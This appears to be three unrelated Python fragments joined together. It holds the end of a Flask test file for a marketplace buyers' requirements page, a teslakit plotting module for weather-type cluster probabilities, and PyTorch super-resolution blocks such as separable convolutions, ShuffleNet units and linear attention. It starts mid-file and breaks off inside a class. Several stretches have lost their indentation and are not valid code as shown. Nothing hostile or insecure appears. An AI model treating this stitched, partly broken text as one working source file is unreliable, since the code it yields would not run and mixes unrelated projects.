            assert "Supplier questions" in page_html
            assert "Why is my question a question?" in page_html
            assert "Because" in page_html
            assert "Answer a supplier question" in page_html
            assert "No questions or answers have been published" not in page_html
def test_404_if_framework_does_not_allow_brief(self, data_api_client):
with self.app.app_context():
self.login_as_buyer()
data_api_client.get_framework.return_value = api_stubs.framework(
slug='digital-outcomes-and-specialists',
status='live',
lots=[
api_stubs.lot(slug='digital-specialists', allows_brief=False),
]
)
data_api_client.get_brief.return_value = api_stubs.brief()
res = self.client.get(
"/buyers/frameworks/digital-outcomes-and-specialists/requirements/digital-specialists/1234"
)
assert res.status_code == 404
def test_404_if_brief_does_not_belong_to_user(self, data_api_client):
with self.app.app_context():
self.login_as_buyer()
data_api_client.get_framework.return_value = api_stubs.framework(
slug='digital-outcomes-and-specialists',
status='live',
lots=[
api_stubs.lot(slug='digital-specialists', allows_brief=True),
]
)
data_api_client.get_brief.return_value = api_stubs.brief(user_id=234)
res = self.client.get(
"/buyers/frameworks/digital-outcomes-and-specialists/requirements/digital-specialists/1234"
)
assert res.status_code == 404
@mock.patch("app.buyers.views.buyers.content_loader")
def test_links_to_sections_go_to_the_correct_pages_whether_they_be_sections_or_questions(self, content_loader, data_api_client): # noqa
with self.app.app_context():
self.login_as_buyer()
data_api_client.get_framework.return_value = api_stubs.framework(
slug='digital-outcomes-and-specialists',
status='live',
lots=[
api_stubs.lot(slug='digital-specialists', allows_brief=True),
]
)
data_api_client.get_brief.return_value = api_stubs.brief()
content_fixture = ContentLoader('tests/fixtures/content')
content_fixture.load_manifest('dos', 'data', 'edit_brief')
content_loader.get_manifest.return_value = content_fixture.get_manifest('dos', 'edit_brief')
res = self.client.get(
"/buyers/frameworks/digital-outcomes-and-specialists/requirements/digital-specialists/1234"
)
assert res.status_code == 200
document = html.fromstring(res.get_data(as_text=True))
section_steps = document.xpath(
'//*[@id="content"]/div/div/ol[contains(@class, "instruction-list")]')
section_1_link = section_steps[0].xpath('li//a[contains(text(), "section 1")]')
section_2_link = section_steps[0].xpath('li//a[contains(text(), "section 2")]')
section_4_link = section_steps[0].xpath('li//a[contains(text(), "section 4")]')
# section with multiple questions
assert section_1_link[0].get('href').strip() == \
'/buyers/frameworks/digital-outcomes-and-specialists/requirements/digital-specialists/1234/section-1'
# section | |
# File: teslakit/plotting/wts.py
#!/usr/bin/env python
# -*- coding: utf-8 -*-
# common
import os
import os.path as op
from datetime import datetime, timedelta
# pip
import numpy as np
import matplotlib.pyplot as plt
import matplotlib.gridspec as gridspec
import matplotlib.dates as mdates
import matplotlib.colors as mcolors
from matplotlib.colorbar import ColorbarBase
from matplotlib.ticker import MaxNLocator
# teslakit
from ..util.operations import GetBestRowsCols
from .custom_colors import GetClusterColors
from ..kma import ClusterProbabilities, ChangeProbabilities
from .outputs import axplot_compare_histograms
# import constants
from .config import _faspect, _fsize, _fdpi
def GenOneYearDaily(yy=1981, month_ini=1):
    '''Return a generic "perpetual" year as a list of daily datetimes.

    The list starts on the first day of month_ini of year yy and always
    spans exactly 365 consecutive days (timedelta arithmetic, so leap
    days never add a 366th entry).
    '''
    start = datetime(yy, month_ini, 1)
    return [start + timedelta(days=offset) for offset in range(365)]
def Generate_PerpYear_Matrix(num_clusters, bmus_values, bmus_dates,
                             num_sim=1, month_ini=1):
    '''
    Calculate and return the matrix for stacked-bar plotting.

    bmus_dates  - list of datetime.datetime (only works at daily resolution)
    bmus_values - 2D array (time, nsim); cluster values start at 1

    Returns a (num_clusters, 365) array where entry [j, i] is the
    per-simulation fraction of cluster j+1 hits on perpetual-year day i.

    Fix: calendar days with no matching dates previously raised
    ZeroDivisionError (division by len(s)); they are now left as NaN.
    '''
    # generate perpetual year list
    list_pyear = GenOneYearDaily(month_ini=month_ini)

    # aux arrays
    m_plot = np.zeros((num_clusters, len(list_pyear))) * np.nan
    bmus_dates_months = np.array([d.month for d in bmus_dates])
    bmus_dates_days = np.array([d.day for d in bmus_dates])

    # sort data
    for i, dpy in enumerate(list_pyear):
        # indexes of all dates falling on this calendar (month, day)
        s = np.flatnonzero(
            (bmus_dates_months == dpy.month) & (bmus_dates_days == dpy.day)
        )
        if s.size == 0:
            # no data for this day of the perpetual year: leave NaN
            continue

        b = bmus_values[s, :].flatten()
        for j in range(num_clusters):
            # j+1: bmus values start at 1
            count_j = np.sum(b == j + 1)
            m_plot[j, i] = float(count_j) / float(num_sim) / s.size

    return m_plot
def axplot_PerpYear(ax, num_clusters, bmus_values, bmus_dates, num_sim, month_ini):
    '''Axes plot: bmus cluster probabilities over a perpetual year as stacked bars.'''

    # one color per weather type for the stacked bars
    np_colors_int = GetClusterColors(num_clusters)

    # generate dateticks (x axis: 365 perpetual-year days)
    x_val = GenOneYearDaily(month_ini = month_ini)

    # generate plot matrix: (num_clusters, 365) daily cluster probabilities
    m_plot = Generate_PerpYear_Matrix(
        num_clusters, bmus_values, bmus_dates,
        num_sim = num_sim, month_ini = month_ini)

    # plot stacked bars
    # NOTE(review): m_plot[1,:] assumes num_clusters >= 2; m_plot[0,:]
    # would have the same shape — confirm intent.
    bottom_val = np.zeros(m_plot[1,:].shape)
    for r in range(num_clusters):
        row_val = m_plot[r,:]
        ax.bar(
            x_val, row_val, bottom = bottom_val,
            width = 1, color = np.array([np_colors_int[r]])
        )

        # accumulate so the next cluster stacks on top
        bottom_val += row_val

    # customize axis: month ticks, probabilities in [0, 1]
    months = mdates.MonthLocator()
    monthsFmt = mdates.DateFormatter('%b')

    ax.set_xlim(x_val[0], x_val[-1])
    ax.xaxis.set_major_locator(months)
    ax.xaxis.set_major_formatter(monthsFmt)
    ax.set_ylim(0, 1)
    ax.set_ylabel('')
def axplot_ChangeProbs(ax, change_probs, wt_colors,
                       ttl = '', vmin = 0, vmax = 1,
                       cmap = 'Blues', cbar_ttl = ''):
    '''Axes plot: cluster change (transition) probability matrix with WT color strips.

    change_probs - (num_clusters, num_clusters) transition probabilities
    wt_colors    - per-cluster RGB colors used for the custom x/y strips
    '''
    num_clusters = change_probs.shape[0]

    # cluster transition matrix as a colored grid
    pc = ax.pcolor(
        change_probs,
        cmap=cmap, vmin=vmin, vmax=vmax,
    )

    # add colorbar
    cbar = plt.colorbar(pc, ax=ax)
    cbar.ax.tick_params(labelsize=8)
    # fixed tick spacing only for non-default ranges (e.g. difference plots)
    if vmin != 0 or vmax !=1:
        cbar.set_ticks(np.linspace(vmin, vmax, 6))
    cbar.ax.set_ylabel(cbar_ttl, rotation=270, labelpad=20)

    # customize axes: hide numeric labels; the color strips identify clusters
    ax.set_xticks(np.arange(num_clusters)+0.5)
    ax.set_yticks(np.arange(num_clusters)+0.5)
    ax.set_xticklabels([])
    ax.set_yticklabels([])
    ax.set_title(ttl, {'fontsize':10, 'fontweight':'bold'})

    # add custom color axis (one colored cell per weather type)
    ccmap = mcolors.ListedColormap([tuple(r) for r in wt_colors])

    # custom color axis positions, relative to the (already laid out) main axes
    ax_pos = ax.get_position()
    cax_x_pos = [ax_pos.x0, ax_pos.y0-0.03, ax_pos.width, 0.02]
    cax_y_pos = [ax_pos.x0-0.03/_faspect, ax_pos.y0, 0.02/_faspect, ax_pos.height]

    # custom color axis X (strip below the matrix)
    cax_x = ax.figure.add_axes(cax_x_pos)
    cbar_x = ColorbarBase(
        cax_x, cmap = ccmap, orientation='horizontal',
        norm = mcolors.Normalize(vmin=0, vmax=num_clusters),
    )
    cbar_x.set_ticks([])

    # custom color axis Y (strip left of the matrix)
    cax_y= ax.figure.add_axes(cax_y_pos)
    cbar_y = ColorbarBase(
        cax_y, cmap = ccmap, orientation='vertical',
        norm = mcolors.Normalize(vmin=0, vmax=num_clusters),
    )
    cbar_y.set_ticks([])
def axplot_Transition(ax, probs_change_fit, probs_change_sim,
                      ttl='', color='black'):
    '''Axes plot: scatter of historical vs. simulated transition probabilities.'''

    # cluster transition fit vs. sim scatter plot
    pc = ax.scatter(
        probs_change_fit, probs_change_sim,
        color=color, s=5, zorder=2,
    )

    # axis limit from the simulated values, rounded up to the next 0.1
    axlim = np.ceil(10*np.max(probs_change_sim[:]))/10

    # customize axes
    # NOTE(review): plot(([0,0],[1,1])) feeds a 2x2 array as y, which matplotlib
    # plots column-wise — each column is (0, 1) against x = (0, 1), so this
    # draws the y=x reference diagonal (twice). Presumably intentional shorthand.
    ax.plot(([0,0],[1,1]), linestyle='dashed', linewidth=0.5, color='grey',
            zorder=1)
    ax.set_ylabel('Simulated', {'fontsize':8})
    ax.set_xlabel('Historical', {'fontsize':8})
    ax.grid(True, which='major', axis='both', linestyle='--', color='grey')
    ax.tick_params(axis='both', which='major', labelsize=7)
    ax.set_xlim([0, axlim])
    ax.set_ylim([0, axlim])
    ax.set_title(ttl, {'fontsize':10, 'fontweight':'bold'})
def axplot_ClusterProbs(ax, cluster_probs_fit, cluster_probs_sim, wt_colors,
                        ttl=''):
    '''Axes plot: historical vs. simulated cluster probabilities, one colored dot per WT.'''

    # one marker per cluster, colored with its weather-type color
    for cf, cs, wc in zip(cluster_probs_fit, cluster_probs_sim, wt_colors):
        ax.plot(cf, cs, marker='.', markersize=8, color=wc, zorder=2)

    # axis limit from the simulated values, rounded up to the next 0.1
    axlim = np.ceil(10*np.max(cluster_probs_sim[:]))/10

    # customize axes (same y=x diagonal shorthand as axplot_Transition)
    ax.plot(([0,0],[1,1]), linestyle='dashed', linewidth=0.5, color='grey',
            zorder=1)
    ax.set_ylabel('Simulated', {'fontsize':8})
    ax.set_xlabel('Historical', {'fontsize':8})
    ax.grid(True, which='major', axis='both', linestyle='--', color='grey')
    ax.tick_params(axis='both', which='major', labelsize=7)
    ax.set_xlim([0, axlim])
    ax.set_ylim([0, axlim])
    ax.set_title(ttl, {'fontsize':10, 'fontweight':'bold'})
def axplot_WT_Probs(ax, wt_probs,
                    ttl = '', vmin = 0, vmax = 0.1,
                    cmap = 'Blues', caxis='black'):
    '''Axes plot: WT cluster probability grid; returns the pcolor mappable.

    caxis sets the axes spine color (used to color-code panels by parent WT).
    '''

    # probability grid; flipud so row 0 is drawn at the top
    pc = ax.pcolor(
        np.flipud(wt_probs),
        cmap=cmap, vmin=vmin, vmax=vmax,
        edgecolors='k',
    )

    # customize axes
    ax.set_xticks([])
    ax.set_yticks([])
    ax.set_title(ttl, {'fontsize':10, 'fontweight':'bold'})

    # axis color
    plt.setp(ax.spines.values(), color=caxis)
    plt.setp(
        [ax.get_xticklines(), ax.get_yticklines()],
        color=caxis,
    )

    # thicker frame highlights non-default (colored) panels
    if caxis != 'black':
        plt.setp(ax.spines.values(), linewidth=3)

    return pc
def axplot_WT_Hist(ax, bmus, n_clusters, ttl=''):
    '''Axes plot: histogram of WT cluster counts (bmus values start at 1).'''

    # one unit-wide bin per cluster: edges at 1, 2, ..., n_clusters+1
    ax.hist(
        bmus,
        bins = np.arange(1, n_clusters+2),
        edgecolor='k'
    )

    # customize axes: center each tick label on its bin
    #ax.grid('y')

    ax.set_xticks(np.arange(1,n_clusters+1)+0.5)
    ax.set_xticklabels(np.arange(1,n_clusters+1))
    ax.set_xlim([1, n_clusters+1])
    ax.tick_params(axis='both', which='major', labelsize=6)

    ax.set_title(ttl, {'fontsize':10, 'fontweight':'bold'})
def Plot_Compare_PerpYear(num_clusters,
                          bmus_values_sim, bmus_dates_sim,
                          bmus_values_hist, bmus_dates_hist,
                          n_sim = 1, month_ini = 1, show=True):
    '''
    Plot simulated vs. historical bmus comparison in a perpetual year.

    bmus_dates requires 1 day resolution time
    bmus_values set min value has to be 1 (not 0)

    Returns the figure (or None when the resolution check fails).
    '''

    # check dates have 1 day time resolution (via first two entries)
    td_h = bmus_dates_hist[1] - bmus_dates_hist[0]
    td_s = bmus_dates_sim[1] - bmus_dates_sim[0]
    if td_h.days != 1 or td_s.days != 1:
        print('PerpetualYear bmus comparison skipped.')
        print('timedelta (days): Hist - {0}, Sim - {1})'.format(
            td_h.days, td_s.days))
        return

    # plot figure: historical on top, simulation below
    fig, (ax_hist, ax_sim) = plt.subplots(2,1, figsize=(_faspect*_fsize, _fsize))

    # historical perpetual year
    axplot_PerpYear(
        ax_hist, num_clusters, bmus_values_hist, bmus_dates_hist,
        num_sim = 1, month_ini = month_ini,
    )
    ax_hist.set_title('Historical')

    # simulated perpetual year
    axplot_PerpYear(
        ax_sim, num_clusters, bmus_values_sim, bmus_dates_sim,
        num_sim = n_sim, month_ini = month_ini,
    )
    ax_sim.set_title('Simulation')

    # add custom colorbar: one color block per cluster, labelled 1..num_clusters
    np_colors_int = GetClusterColors(num_clusters)
    ccmap = mcolors.ListedColormap(
        [tuple(r) for r in np_colors_int]
    )
    cax = fig.add_axes([0.92, 0.125, 0.025, 0.755])
    cbar = ColorbarBase(
        cax, cmap=ccmap,
        norm = mcolors.Normalize(vmin=0, vmax=num_clusters),
        ticks = np.arange(num_clusters) + 0.5,
    )
    cbar.ax.tick_params(labelsize=8)
    cbar.set_ticklabels(range(1, num_clusters + 1))

    # text
    fig.suptitle('Perpetual Year', fontweight='bold', fontsize=12)

    # show and return figure
    if show: plt.show()
    return fig
def Plot_Compare_Transitions(num_clusters, bmus_values_hist, bmus_values_sim,
                             sttl=None, show=True):
    '''
    Plot many probabilities transition comparisons between 2 bmus series.

    bmus_values_hist, bmus_values_sim (series x n_sim) - bmus series to compare
    num_clusters - total number of clusters at series

    Returns the figure.
    '''

    # if n_sim > 1 lets safe-join simulated bmus for probs calcs:
    # a NaN row is appended before flattening column-wise so transitions
    # across simulation boundaries are not counted
    n_sim = bmus_values_sim.shape[1]
    if n_sim > 1:

        # add nan splitter and then flatten
        bmus_values_sim = np.append(
            bmus_values_sim, np.zeros((1, n_sim))*np.nan,
            axis = 0,
        )
        bmus_values_sim = bmus_values_sim.flatten('F')

    # get cluster colors
    wt_colors = GetClusterColors(num_clusters)
    wt_set = np.arange(num_clusters) + 1

    # cluster probabilities
    probs_c_fit = ClusterProbabilities(bmus_values_hist, wt_set)
    probs_c_sim = ClusterProbabilities(bmus_values_sim, wt_set)

    # cluster change probabilities
    _, chprobs_fit = ChangeProbabilities(bmus_values_hist, wt_set)
    _, chprobs_rnd = ChangeProbabilities(bmus_values_sim, wt_set)
    chprobs_dif = chprobs_rnd - chprobs_fit

    # figure
    fig = plt.figure(figsize=(_faspect*_fsize, _fsize))

    # layout: three matrices on top, two scatter comparisons below
    gs = gridspec.GridSpec(2, 6, wspace=0.60, hspace=0.35)
    ax_chpr_fit = plt.subplot(gs[0, :2])
    ax_chpr_rnd = plt.subplot(gs[0, 2:4])
    ax_chpr_dif = plt.subplot(gs[0, 4:])
    ax_scat_tra = plt.subplot(gs[1, 1:3])
    ax_scat_pbs = plt.subplot(gs[1, 3:5])

    # cluster change probs axes
    axplot_ChangeProbs(ax_chpr_fit, chprobs_fit, wt_colors,
                       'Historical WT Transition Probabilities')
    axplot_ChangeProbs(ax_chpr_rnd, chprobs_rnd, wt_colors,
                       'Simulation WT Transition Probabilities')
    axplot_ChangeProbs(ax_chpr_dif, chprobs_dif, wt_colors,
                       'Change in WT Transition Probabilities',
                       vmin=-0.05, vmax=0.05, cmap='RdBu_r',
                       cbar_ttl='Simulation - Historical',
                      )

    # scatter plot transitions
    axplot_Transition(ax_scat_tra, chprobs_fit, chprobs_rnd,
                      'Sim. vs. Hist. WT Transition Probabilities'
                     )

    # scatter plot cluster probs
    axplot_ClusterProbs(ax_scat_pbs, probs_c_fit, probs_c_sim, wt_colors,
                        'Sim. vs. Hist. WT Probabilities',
                       )

    # suptitle
    if sttl != None:
        fig.suptitle(sttl, fontweight='bold', fontsize=12)

    # show and return figure
    if show: plt.show()
    return fig
def Plot_Probs_WT_WT(series_1, series_2, n_clusters_1, n_clusters_2, ttl='',
                     wt_colors=False, show=True):
    '''
    Plot WTs_1 / WTs_2 probabilities: one probability grid of series_2
    clusters for each series_1 cluster.

    both categories series should start at 0

    Returns the figure.
    '''

    # set of daily weather types
    set_2 = np.arange(n_clusters_2)

    # daily weather types matrix rows and cols
    n_rows, n_cols = GetBestRowsCols(n_clusters_2)

    # get cluster colors
    cs_wt = GetClusterColors(n_clusters_1)

    # plot figure: one panel per series_1 cluster
    fig = plt.figure(figsize=(_faspect*_fsize, _fsize/3))
    gs = gridspec.GridSpec(1, n_clusters_1, wspace=0.10, hspace=0.15)

    for ic in range(n_clusters_1):
        # select series_2 values at the current series_1 cluster indexes
        index_1 = np.where(series_1==ic)[0][:]
        sel_2 = series_2[index_1]

        # get cluster probabilities, reshaped into the panel grid
        cps = ClusterProbabilities(sel_2, set_2)
        C_T = np.reshape(cps, (n_rows, n_cols))

        # axis colors: color-code panel frames by parent WT when requested
        if wt_colors:
            caxis = cs_wt[ic]
        else:
            caxis = 'black'

        # plot axes
        ax = plt.subplot(gs[0, ic])
        axplot_WT_Probs(
            ax, C_T,
            ttl = 'WT {0}'.format(ic+1),
            cmap = 'Reds', caxis = caxis,
        )
        ax.set_aspect('equal')

    # add fig title
    fig.suptitle(ttl, fontsize=14, fontweight='bold')

    # show and return figure
    if show: plt.show()
    return fig
def Plot_Probs_WT_WT_anomaly(series_1, series_2, n_clusters_1, n_clusters_2, ttl='',
wt_colors=False, show=True):
'''
Plot WTs_1 / WTs_2 probabilities
both categories series should start at 0
'''
# set of daily weather types
set_2 = np.arange(n_clusters_2)
# dailt weather types matrix rows and cols
n_rows, n_cols = GetBestRowsCols(n_clusters_2)
# get cluster colors
cs_wt | |
'''
This module implements building blocks and tools for efficient super-resolution (SR).

@author
<NAME> from SIAT
<NAME> from SIAT
'''
from functools import partial
import torch
import torch.nn as nn
import math
import torch.nn.functional as F
from distutils.version import LooseVersion
# Throughout this file, 1x1 (pointwise) convolutions are implemented with nn.Linear
# applied on a channels-last permutation of the tensor.
class DepthWiseConv(nn.Module):
    """Depthwise-separable convolution: a depthwise Conv2d followed by a
    pointwise (1x1) projection implemented as nn.Linear on a channels-last
    view of the tensor.

    Fix: the original accepted kernel_size/stride/padding/dilation/bias/
    padding_mode but ignored them, always building a 3x3 stride-1 depthwise
    conv; the arguments are now forwarded (defaults keep the old behavior).
    """

    def __init__(self, in_ch, out_ch, kernel_size=3, stride=1, padding=1,
                 dilation=1, bias=True, padding_mode="zeros", with_norm=True, bn_kwargs=None):
        super(DepthWiseConv, self).__init__()
        # depthwise: one filter per input channel (groups == in_ch, i.e. a
        # grouped conv with group size 1)
        self.depth_conv = nn.Conv2d(in_channels=in_ch,
                                    out_channels=in_ch,
                                    kernel_size=kernel_size,
                                    stride=stride,
                                    padding=padding,
                                    dilation=dilation,
                                    bias=bias,
                                    padding_mode=padding_mode,
                                    groups=in_ch)
        # pointwise 1x1 conv expressed as a Linear over the channel dim
        self.point_conv = nn.Linear(in_ch, out_ch)
        # NOTE(review): with_norm / bn_kwargs are accepted for signature
        # compatibility with sibling blocks but are not used here.

    def forward(self, input):
        out = self.depth_conv(input)
        # NCHW -> NHWC so nn.Linear acts on channels, then back to NCHW
        out = out.permute(0, 2, 3, 1)
        out = self.point_conv(out)
        out = out.permute(0, 3, 1, 2)
        return out
class BSConvU(torch.nn.Module):
    """Blueprint-separable convolution, unconstrained variant: a pointwise
    projection (nn.Linear on channels-last), an optional LayerNorm, then a
    depthwise Conv2d.
    """

    def __init__(self, in_channels, out_channels, kernel_size=3, stride=1, padding=1,
                 dilation=1, bias=True, padding_mode="zeros", with_ln=True, bn_kwargs=None):
        super().__init__()
        self.with_ln = with_ln
        if bn_kwargs is None:
            bn_kwargs = {}

        # pointwise 1x1 projection, expressed as a Linear over channels
        self.pw = nn.Linear(in_channels, out_channels)

        # optional layer norm over the (last) channel dimension
        if with_ln:
            self.ln = torch.nn.LayerNorm(out_channels, **bn_kwargs)

        # depthwise conv: one filter per channel (groups == out_channels)
        self.dw = torch.nn.Conv2d(
            in_channels=out_channels,
            out_channels=out_channels,
            kernel_size=kernel_size,
            stride=stride,
            padding=padding,
            dilation=dilation,
            groups=out_channels,
            bias=bias,
            padding_mode=padding_mode,
        )

    def forward(self, fea):
        # NCHW -> NHWC for the Linear / LayerNorm, back to NCHW for the conv
        nhwc = fea.permute(0, 2, 3, 1)
        nhwc = self.pw(nhwc)
        if self.with_ln:
            nhwc = self.ln(nhwc)
        return self.dw(nhwc.permute(0, 3, 1, 2))
class BSConvS(torch.nn.Module):
    """Blueprint-separable convolution, subspace variant: two pointwise
    projections (in -> mid -> out, each as nn.Linear on channels-last) with
    optional LayerNorms, followed by a depthwise Conv2d.

    `p` controls the intermediate subspace size:
    mid_channels = min(in_channels, max(min_mid_channels, ceil(p * in_channels))).
    """

    def __init__(self, in_channels, out_channels, kernel_size=3, stride=1, padding=1, dilation=1, bias=True,
                 padding_mode="zeros", p=0.25, min_mid_channels=4, with_ln=True, bn_kwargs=None):
        super().__init__()
        self.with_ln = with_ln

        # check arguments
        assert 0.0 <= p <= 1.0
        mid_channels = min(in_channels, max(min_mid_channels, math.ceil(p * in_channels)))
        if bn_kwargs is None:
            bn_kwargs = {}

        # pointwise 1: project into the low-rank subspace
        self.pw1 = nn.Linear(in_channels, mid_channels)
        if with_ln:
            self.ln1 = torch.nn.LayerNorm(mid_channels, **bn_kwargs)

        # pointwise 2: project up to the output channels
        self.pw2 = nn.Linear(mid_channels, out_channels)
        if with_ln:
            self.ln2 = torch.nn.LayerNorm(out_channels, **bn_kwargs)

        # depthwise conv: one filter per channel (groups == out_channels)
        self.dw = torch.nn.Conv2d(
            in_channels=out_channels,
            out_channels=out_channels,
            kernel_size=kernel_size,
            stride=stride,
            padding=padding,
            dilation=dilation,
            groups=out_channels,
            bias=bias,
            padding_mode=padding_mode,
        )

    def forward(self, x):
        # NCHW -> NHWC for the Linear / LayerNorm layers
        fea = x.permute(0, 2, 3, 1)
        fea = self.pw1(fea)
        if self.with_ln:
            fea = self.ln1(fea)
        fea = self.pw2(fea)
        if self.with_ln:
            fea = self.ln2(fea)
        # back to NCHW for the depthwise conv
        return self.dw(fea.permute(0, 3, 1, 2))

    def _reg_loss(self):
        """Frobenius-norm orthogonality penalty ||W W^T - I|| on the first
        pointwise projection.

        Fix: the original read `self[0].weight[:, :, 0, 0]` — a leftover from
        an nn.Sequential-based implementation; BSConvS is a plain Module, so
        `self[0]` raised TypeError. The pw1 Linear weight has the same
        (mid_channels, in_channels) shape, so it is used directly.
        """
        W = self.pw1.weight
        WWt = torch.mm(W, torch.transpose(W, 0, 1))
        I = torch.eye(WWt.shape[0], device=WWt.device)
        return torch.norm(WWt - I, p="fro")
# replicate the input RGB channels at the head of the net
class ChannelReplicate(nn.Module):
    """Repeat the input tensor `factor` times along the channel dimension."""

    def __init__(self, factor=3):
        super(ChannelReplicate, self).__init__()
        self.factor = factor

    def forward(self, input):
        # all copies are identical, so a single concatenation is equivalent
        # to the original iterative cat loop
        return torch.cat([input] * self.factor, dim=1)
# shuffleNetv1
# shuffle block combining grouped 1x1 convs with channel shuffle
class ShuffleV1Block(nn.Module):
    """ShuffleNet-v1 unit: grouped pointwise conv -> channel shuffle ->
    depthwise conv -> grouped pointwise conv, with a residual (stride 1)
    or avg-pool concat shortcut (stride 2).
    """

    def __init__(self, inp, oup, *, group, first_group, mid_channels, ksize, stride):
        super(ShuffleV1Block, self).__init__()
        self.stride = stride
        assert stride in [1, 2]

        self.mid_channels = mid_channels
        self.ksize = ksize
        pad = ksize // 2
        self.pad = pad
        self.inp = inp
        self.group = group

        # stride-2 units concatenate the shortcut, so the main branch only
        # produces the remaining (oup - inp) channels
        if stride == 2:
            outputs = oup - inp
        else:
            outputs = oup

        branch_main_1 = [
            # pw: first unit of a stage takes ungrouped input (first_group)
            nn.Conv2d(inp, mid_channels, 1, 1, 0, groups=1 if first_group else group, bias=False),
            nn.BatchNorm2d(mid_channels),
            nn.ReLU(inplace=True),
            # dw
            nn.Conv2d(mid_channels, mid_channels, ksize, stride, pad, groups=mid_channels, bias=False),
            nn.BatchNorm2d(mid_channels),
        ]
        branch_main_2 = [
            # pw-linear (no activation before the merge)
            nn.Conv2d(mid_channels, outputs, 1, 1, 0, groups=group, bias=False),
            nn.BatchNorm2d(outputs),
        ]
        self.branch_main_1 = nn.Sequential(*branch_main_1)
        self.branch_main_2 = nn.Sequential(*branch_main_2)

        if stride == 2:
            self.branch_proj = nn.AvgPool2d(kernel_size=3, stride=2, padding=1)

    def forward(self, old_x):
        x = old_x
        x_proj = old_x
        x = self.branch_main_1(x)
        if self.group > 1:
            x = self.channel_shuffle_v1(x)
            # NOTE(review): original author comment (translated): "I think this
            # is questionable — the channel shuffle should come right after the
            # pointwise conv inside branch_main_1, not after the depthwise conv."
            # Behavior kept as-is.
        x = self.branch_main_2(x)
        if self.stride == 1:
            # residual add
            return F.relu(x + x_proj)
        elif self.stride == 2:
            # downsample: concat avg-pooled shortcut with main branch
            return torch.cat((self.branch_proj(x_proj), F.relu(x)), 1)

    def channel_shuffle_v1(self, x):
        """Interleave channels across groups: (N, C, H, W) -> grouped
        reshape -> transpose -> flatten back to (N, C, H, W)."""
        batchsize, num_channels, height, width = x.data.size()
        assert num_channels % self.group == 0
        group_channels = num_channels // self.group

        x = x.reshape(batchsize, group_channels, self.group, height, width)
        # transpose group axes: x is now (batch, group, group_channels, h, w)
        x = x.permute(0, 2, 1, 3, 4)
        x = x.reshape(batchsize, num_channels, height, width)

        return x
# ShuffleNet v2 block
# Grouped conv --> plain conv; channel shuffle is removed from inside the branch
class ShuffleV2Block(nn.Module):
    """ShuffleNet v2 unit: channel split + plain (ungrouped) convolutions;
    the channel shuffle happens between blocks via channel_shuffle_v2.
    """
    def __init__(self, inp, oup, mid_channels, *, ksize, stride):
        super(ShuffleV2Block, self).__init__()
        self.stride = stride
        assert stride in [1, 2]
        self.mid_channels = mid_channels
        self.ksize = ksize
        pad = ksize // 2
        self.pad = pad
        self.inp = inp
        # The shortcut branch contributes inp channels after the concat.
        outputs = oup - inp
        branch_main = [
            # pw
            nn.Conv2d(inp, mid_channels, 1, 1, 0, bias=False),
            nn.BatchNorm2d(mid_channels),
            nn.ReLU(inplace=True),
            # dw
            nn.Conv2d(mid_channels, mid_channels, ksize, stride, pad, groups=mid_channels, bias=False),
            nn.BatchNorm2d(mid_channels),
            # pw-linear
            nn.Conv2d(mid_channels, outputs, 1, 1, 0, bias=False),
            nn.BatchNorm2d(outputs),
            nn.ReLU(inplace=True),
        ]
        self.branch_main = nn.Sequential(*branch_main)
        if stride == 2:
            branch_proj = [
                # dw
                nn.Conv2d(inp, inp, ksize, stride, pad, groups=inp, bias=False),
                nn.BatchNorm2d(inp),
                # pw-linear
                nn.Conv2d(inp, inp, 1, 1, 0, bias=False),
                nn.BatchNorm2d(inp),
                nn.ReLU(inplace=True),
            ]
            self.branch_proj = nn.Sequential(*branch_proj)
        else:
            self.branch_proj = None
    def forward(self, old_x):
        if self.stride==1:
            x_proj, x = self.channel_shuffle_v2(old_x)
            return torch.cat((x_proj, self.branch_main(x)), 1)
            # (translated) the previous block's output is split into two
            # halves here; the identity half realizes the "channel split",
            # and the halves are concatenated along channels afterwards.
        elif self.stride==2:
            x_proj = old_x
            x = old_x
            return torch.cat((self.branch_proj(x_proj), self.branch_main(x)), 1)
            # (translated) corresponds to the stride-2 unit (the second
            # figure) in the ShuffleNet v2 paper.
    def channel_shuffle_v2(self, x):
        """Shuffle channels pairwise and return the two half-channel splits."""
        batchsize, num_channels, height, width = x.data.size()
        assert (num_channels % 4 == 0)
        x = x.reshape(batchsize * num_channels // 2, 2, height * width)
        x = x.permute(1, 0, 2)
        x = x.reshape(2, -1, num_channels // 2, height, width)
        return x[0], x[1]
# Performer
# For simplicity you can just import and use it like below:
# from performer_pytorch import FastAttention
# See https://github.com/lucidrains/performer-pytorch for more details
# Linear Transformer
# https://github.com/idiap/fast-transformers
# Linear Transformer
class FeatureMap(nn.Module):
    """Interface for the query/key feature maps used by linear attention."""
    def __init__(self, query_dims):
        super().__init__()
        self.query_dims = query_dims

    def new_feature_map(self, device):
        """Prepare a fresh feature map; random maps resample their
        parameters here."""
        raise NotImplementedError()

    def forward_queries(self, x):
        """Map the queries ``x`` through the feature map."""
        return self(x)

    def forward_keys(self, x):
        """Map the keys ``x`` through the feature map."""
        return self(x)

    def forward(self, x):
        """Symmetric encoding of ``x``. Asymmetric maps should instead
        override the ``forward_queries``/``forward_keys`` pair."""
        raise NotImplementedError()

    @classmethod
    def factory(cls, *args, **kwargs):
        """Bind constructor arguments now; the returned callable accepts
        only ``query_dims`` and builds an instance of ``cls``.

        Inherited, so every subclass gets a matching factory.
        """
        def build(query_dims):
            return cls(query_dims, *args, **kwargs)
        return build
class ActivationFunctionFeatureMap(FeatureMap):
    """Stateless feature map: apply an element-wise activation function."""
    def __init__(self, query_dims, activation_function):
        super().__init__(query_dims)
        self.activation_function = activation_function

    def new_feature_map(self, device):
        # Deterministic map: nothing to (re)sample.
        return

    def forward(self, x):
        return self.activation_function(x)
class LinearAttention(nn.Module):
"""Implement unmasked attention using dot product of feature maps in
O(N D^2) complexity.
Given the queries, keys and values as Q, K, V instead of computing
V' = softmax(Q.mm(K.t()), dim=-1).mm(V),
we make use of a feature map function Φ(.) and perform the following
computation
V' = normalize(Φ(Q).mm(Φ(K).t())).mm(V).
The above can be computed in O(N D^2) complexity where D is the
dimensionality of Q, K and V and N is the sequence length. Depending on the
feature map, however, the complexity of the attention might be limited.
Arguments
---------
feature_map: callable, a callable that applies the feature map to the
last dimension of a tensor (default: elu(x)+1)
eps: float, a small number to ensure the numerical stability of the
denominator (default: 1e-6)
event_dispatcher: str or EventDispatcher instance to be used by this
module for dispatching events (default: the default
global dispatcher)
"""
def __init__(self, query_dimensions, feature_map=None, eps=1e-6,
event_dispatcher=""):
super(LinearAttention, self).__init__()
elu_feature_map = ActivationFunctionFeatureMap.factory(
lambda x: torch.nn.functional.elu(x) + 1
)
